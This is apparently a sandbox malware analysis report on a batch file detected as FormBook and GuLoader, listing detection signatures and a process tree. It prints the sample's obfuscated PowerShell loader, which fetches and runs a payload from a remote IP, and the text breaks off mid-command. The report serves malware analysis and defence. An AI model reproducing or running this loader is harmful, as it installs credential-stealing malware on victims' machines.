Windows Analysis Report
PO_La-Tanerie04180240124.bat
Overview
General Information
Detection
FormBook, GuLoader
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64native
- cmd.exe (PID: 8088, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7464, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  - powershell.exe (PID: 3124, cmdline:
powershell .exe -wind owstyle hi dden "$Rut henious = 1;$dirknin gernes='Su bstrin';$d irkningern es+='g';Fu nction Son edkkets($F umingly){$ Programmer ingsbegreb et=$Fuming ly.Length- $Rutheniou s;For($Ozo nify=1; $O zonify -lt $Programm eringsbegr ebet; $Ozo nify+=(2)) {$Hjul+=$F umingly.$d irkningern es.Invoke( $Ozonify, $Rutheniou s);}$Hjul; }function Innovative ($Oryctogn osy238){. ($Com plexes) ($ Oryctognos y238);}$Gl asskaaret= Sonedkkets ' MHoKz.i BlFlEa /U5 S. 0S A(IW .i nKdDo,w s, BN T , 1 0 .S0C;, KWIiUn 6T 4F; .x,6,4 S;, TrBv : T1I2B1S.C0 E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rR eTf orxL/. 1 2.1O. 0 ';$Beshami ng=Sonedkk ets ' UCsH eUr -MA.g. e,n.tB ';$ Bladfod=So nedkkets ' hOt t pP: a/S/,8 7,. C1T2v1L. 1 R0R5L. 1 6 O3H/.L i,c PeUn c.eJs A.,t.trf ' ;$Gruppeme dlemmernes =Sonedkket s 'S> ';$C omplexes=S onedkkets 'EiReAxB ' ;$Gambia = Sonedkket s ' e,cTh o B%Aa,pEp OdOa t,a.% S\ P,rWeSz SyCg,oVmMa It.iLc,.AB .e n, u& & .eLcDhBo. $. ';Inno vative (So nedkkets ' B$CgSlSo b BaGl :.UUn wGa r.r,a AnCt a b.i lti tDy = D(UcAm,df /IcL A$ GO a.m b imaV ) ');Innov ative (Son edkkets 'T $ g lFoDb a l.:MHKe e l.t a,p, 2 6m= $BB, l a dIfSoU d .ssfp lC i t.(V$OGU r u p,p e mBe dSlAeC m m ePrhnK e s.) ');$ Bladfod=$H eeltap26[0 ];Innovati ve (Sonedk kets ',$Tg Pl o bGaDl O:,RPr b l a,d eTs = MNTe w -AO Sb,j eUc t AS.y sSt e.m .AN e t .RWFeMbt C l i eLn t, ');Inno vative (So nedkkets ' $ RArDb.l Da.d,eHs,. .HGe.aSdCe .rLs [ $kB .ess.hKa m SiNnOgT]V= K$ GIlFaAs AsKk a.a r e t ');$F orvanskes= Sonedkkets ' RHrEbLl paUdPeTsp. AD oTwSnPl moOaSdSFCi Cl e (s$.B Ml.aDdPf o FdT,B$DHPo Co.pHoUe,s ,), ';$For vanskes=$U nwarrantab ility[1]+$ Forvanskes ;$Hoopoes= $Unwarrant ability[0] ;Innovativ e (Sonedkk ets ' $.gA lZoSb a lA :FGFrAa vR h j eN=D(M TTe,s t -S P a tFh $ AHRo o.pAo Re sS)A ') ;while (!$ Gravhje) { Innovative (Sonedkke ts 'P$ gal o bTa lL: S t uKefa rPr e s.t meFn s =S$ PtRrTuBe. 
') ;Innova tive $Forv anskes;Inn ovative (S onedkkets ',S.tTa rC tD-ISDl eW e pA ,4 ') ;Innovativ e (Sonedkk ets 'B$Eg, lKo.b a,l :WGIrLa,v. hVj el=.( T ecsUtM-B PRa t h G$ LHSoSoGpco PeSs,)E ') ;Innovati ve (Sonedk kets ' $ g Dl o b.aAl D:,S.u,pRe Nr fEiHnSi .c aBlO=S$ ng,l.oFb.a .lM:RVDi t Uh aMr,d.t Fs,+ +A%.$ ,Hpe.e l t na p 2K6,. .cSoBu nCt . ') ;$Bla dfod=$Heel tap26[$Sup erfinical] ;}Innovati ve (Sonedk kets 'F$.g SlMo bAa l ,:BGFu l i xG ,=E BG ,eWt -PC o DnDt,eGnMt $UH oBoB p oPeTsU ' );Innovati ve (Sonedk kets 'E$.g LlRolb.aOl t: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP .JCUoPnCv eBr t ]M:B : FFrCoTm, B,aKsMeE6G 4IS.tSrTiF n,g.(S$FG u lRimx.)U ');Innova tive (Sone dkkets ',$ Mg lVo b,a lK: G a r ,dIe nTpBa rUt iQeBn